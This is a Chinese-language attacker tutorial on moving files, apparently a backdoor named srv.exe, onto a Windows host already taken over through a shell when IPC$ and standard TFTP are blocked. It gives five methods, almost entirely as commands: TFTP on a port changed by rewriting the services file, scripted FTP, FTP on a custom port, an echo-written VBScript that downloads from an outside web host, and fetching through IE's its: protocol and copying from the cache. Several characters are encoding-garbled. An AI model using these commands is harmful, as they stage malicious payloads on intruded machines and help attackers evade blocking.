本文是居于已經(jīng)得到了一個(gè)有一定權(quán)限的SHELL.用IPC$傳送文件和TFTP傳送文件不可行。實(shí)現(xiàn)在命令行下傳送文件的其他方法.
　　
    一、TFTP＋自定義端口

　　限制用TFTP傳送文件，一般就是直接封69端口，我們?cè)谟肨FTP傳送文件的時(shí)候，一般用tftp -i xxx.xxx.xxx.xxx get srv.exe來(lái)下載，TFTP默認(rèn)的是69端口，那么怎么才能改這個(gè)端口了？TFTPD32.exe等TFTP服務(wù)端是可以自己設(shè)置端口的，這里就不多講，只不過(guò)在設(shè)置后要重新啟動(dòng)一次
　　TFTP服務(wù)端。至于客戶端
　　在system32\drivers\etc\文件夾下有一個(gè)services文件。打開如下：
　　# Copyright (c) 1993-1999 Microsoft Corp.
　　#
　　# This file contains port numbers for well-known services defined by IANA
　　#
　　# Format:
　　#
　　# ＜service name＞ ＜port number＞/＜protocol＞ [aliases...] [#＜comment＞]
　　#
　　
　　echo 7/tcp
　　echo 7/udp
　　discard 9/tcp sink null
　　discard 9/udp sink null
　　systat 11/tcp users #Active users
　　systat 11/tcp users #Active users
　　...
　　tftp 69/udp #Trivial File Transfer
　　...
　 　　不難看出，69/udp就是定義tftp默認(rèn)端口的，協(xié)議為udp。
　　好啦！具體怎么用只要這兩句，其實(shí)就是比原來(lái)多加了一句改端口的：
　　echo tftp 8300/udp ＞ %systemroot%\system32\drivers\etc\services
　　tftp -i xxx.xxx.xxx.xxx get srv.exe
　　注意：請(qǐng)先把tftp服務(wù)端端口設(shè)定為與自定義端口一樣的，這里是8300。
　　安全點(diǎn)的做法:
　　ren %systemroot%\system32\drivers\etc\services 1
　　echo tftp 8300/udp ＞2
　　copy 2+%systemroot%\system32\drivers\etc\1 %systemroot%\system32\drivers\etc\services

　　二：ftp下載文件

　　ftp下載文件一般步驟如下：
　　echo open xxx.xxx.xxx.xxx >ftp.txt
　　echo user >>ftp.txt
　　echo password >>ftp.txt
　　echo binary >>ftp.txt [可選]
　　echo get srv.exe >>ftp.txt
　　echo bye >>ftp.txt
　　ftp -s:ftp.txt(這一步是關(guān)鍵喲)
　　del ftp.txt
　　這樣srv.exe文件就下在下來(lái)了。

    三：ftp＋自定義端口

　　其實(shí)ftp自定義端口非常簡(jiǎn)單，只要在ip地址后面空格，緊跟自定義的端口就可以了，如下：
　　echo open xxx.xxx.xxx.xxx 2121 >ftp.txt
　　echo user >>ftp.txt
　　echo password >>ftp.txt
　　echo binary >>ftp.txt [可選]
　　echo get srv.exe >>ftp.txt
　　echo bye >>ftp.txt
　　ftp -s:ftp.txt
　　del ftp.txt
　　這里自定義端口為2121，只要和ftp服務(wù)端的端口一致就行拉。

    四：寫程序下載

　　腳本是非常好的東西，只要把源碼保存到一個(gè)文件中就能運(yùn)行。所以在shell下，用
　　echo語(yǔ)句直接寫到一個(gè)文件中，在用相應(yīng)的解釋程序執(zhí)行就可以啦。這里是一個(gè)程序
　　實(shí)例的簡(jiǎn)化:
　　echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
　　echo xPost.Open "GET","http://txhak.126.com/srv.exe",0 >>webdown.vbs
　　echo xPost.Send() >>webdown.vbs
　　echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
　　echo sGet.Mode = 3 >>webdown.vbs
　
　　echo sGet.Type = 1 >>webdown.vbs
　　echo sGet.Open() >>webdown.vbs
　　echo sGet.Write(xPost.responseBody) >>webdown.vbs
　　echo sGet.SaveToFile "srv.exe",2 >>webdown.vbs
　　然后執(zhí)行cscript webdown.vbs就可以啦.其中，http://txhak.126.com/srv.exe改成你放文件的網(wǎng)站路徑，srv.exe可以改成保存文件的路徑。

    五：START ITS:HTTP://IP/文件名

　　然后cd "C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\"
　　然后DIR 文件名[1]
　　注意：那串長(zhǎng)文件名要用""引起來(lái)，因?yàn)橛锌崭?
　　例子：C:\Documents and Settings\Administrator>start its:http://xxx.xxx.xxx.xxx/srv.exe
　　C:\Documents and Settings\Administrator>dir /s srv[1].exe
　　驅(qū)動(dòng)器 C 中的卷沒有標(biāo)簽。
　　卷的序列號(hào)是 D491-7A7F
　　C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1 的目錄
　　2003-11-22 17:48 12,832 srv[1].exe
　　1 個(gè)文件 12,832 字節(jié)
　　列出所有文件:
　　1 個(gè)文件 12,832 字節(jié)
　　0 個(gè)目錄 6,425,985,024 可用字節(jié)
　　C:\Documents and Settings\Administrator>copy C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\0AB3MNO1\srv[1].exe c:\srv.exe
　　已復(fù)制 1 個(gè)文件。